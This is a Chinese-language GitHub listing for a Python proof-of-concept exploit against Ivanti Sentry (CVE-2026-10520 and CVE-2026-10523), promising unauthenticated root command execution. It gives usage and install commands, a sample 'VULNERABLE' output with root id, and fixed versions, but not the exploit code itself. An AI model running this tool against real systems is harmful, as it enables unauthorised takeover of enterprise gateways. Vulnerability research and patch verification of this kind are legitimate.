0xBlackash/CVE-2026-10520

GitHub: 0xBlackash/CVE-2026-10520

该工具是针对 Ivanti Sentry 两个严重漏洞（Pre-Auth RCE 与身份验证绕过）的 Python PoC 漏洞利用脚本，用于验证目标系统的安全性。

Stars: 3 | Forks: 0

# 🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry ChatGPT Image Jun 11, 2026, 11_19_12 AM

![Ivanti Sentry](https://img.shields.io/badge/Ivanti-Sentry-red?style=for-the-badge) ![Critical](https://img.shields.io/badge/Severity-CRITICAL-red?style=for-the-badge) ![RCE](https://img.shields.io/badge/Pre--Auth-RCE-blue?style=for-the-badge) **Pre-Authentication 远程代码执行 + 身份验证绕过** **作者：** Ashraf Zaryouh **"0xBlackash"** [![GitHub](https://img.shields.io/badge/GitHub-0xBlackash-black?style=for-the-badge&logo=github)](https://github.com/0xBlackash)

## 📌 概述影响 **Ivanti Sentry**（前身为 MobileIron Sentry）的两个严重漏洞： - **CVE-2026-10520** → **CVSS 10.0** - Pre-auth OS 命令注入（以 root 权限进行 RCE） - **CVE-2026-10523** → **CVSS 9.9** - 身份验证绕过这些缺陷允许未经身份验证的攻击者实现完全的系统入侵。 ## ✨ 功能 - ✅ 简洁快速的 PoC - ✅ Pre-Authentication（无需凭据） - ✅ Root 级别的命令执行 - ✅ 详细的输出格式 - ✅ 代理支持 - ✅ Verbose 模式 - ✅ 精美的终端 UI ## 🚀 用法 ``` python3 CVE-2026-10520.py --url --cmd ``` ### 示例 ``` # 基本用法 python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id" # Verbose 模式 python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v # 使用 proxy python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080 # 检查 kernel python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" ``` ## 📋 选项 | 参数 | 描述 | 是否必需 | |--------------|------------------------------------|----------| | `--url` | 目标 URL (例如 https://target:8443) | 是 | | `--cmd` | 要执行的命令 | 是 | | `-v, --verbose` | 启用详细输出 | 否 | | `--proxy` | HTTP 代理 (主机:端口) | 否 | ## 🛠️ 安装说明 ``` git clone https://github.com/0xBlackash/CVE-2026-10520.git cd CVE-2026-10520 chmod +x CVE-2026-10520.py ``` ## 📷 成功利用如果存在漏洞，您将看到： ``` ██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗ ██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║ ██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║ ████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║ ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ CVE-2026-10520 & CVE-2026-10523 PoC Exploit Ivanti Sentry Pre-Auth RCE + Auth Bypass Author: Ashraf Zaryouh "0xBlackash" GitHub: https://github.com/0xBlackash [+] Target is VULNERABLE! Command Output: uid=0(root) gid=0(root) groups=0(root) ``` ## ⚠️ 免责声明 ## 🔧 受影响版本 - **10.5.2, 10.6.2, 10.7.1** 之前的 Ivanti Sentry **已在以下版本中修复：** 10.5.2 / 10.6.2 / 10.7.1 ## 📜 参考 - 官方 Ivanti 公告 - watchTowr Labs 原创研究 - NVD 条目：[CVE-2026-10520](https://nvd.nist.gov/vuln/detail/CVE-2026-10520)，[CVE-2026-10523](https://nvd.nist.gov/vuln/detail/CVE-2026-10523)

**由 Ashraf Zaryouh "0xBlackash" 用 ❤️ 制作** **如果觉得有用，请给仓库点个 Star！** ⭐

标签：CISA项目, CSV导出, Python, 命令注入, 文档结构分析, 无后门, 身份验证绕过, 逆向工具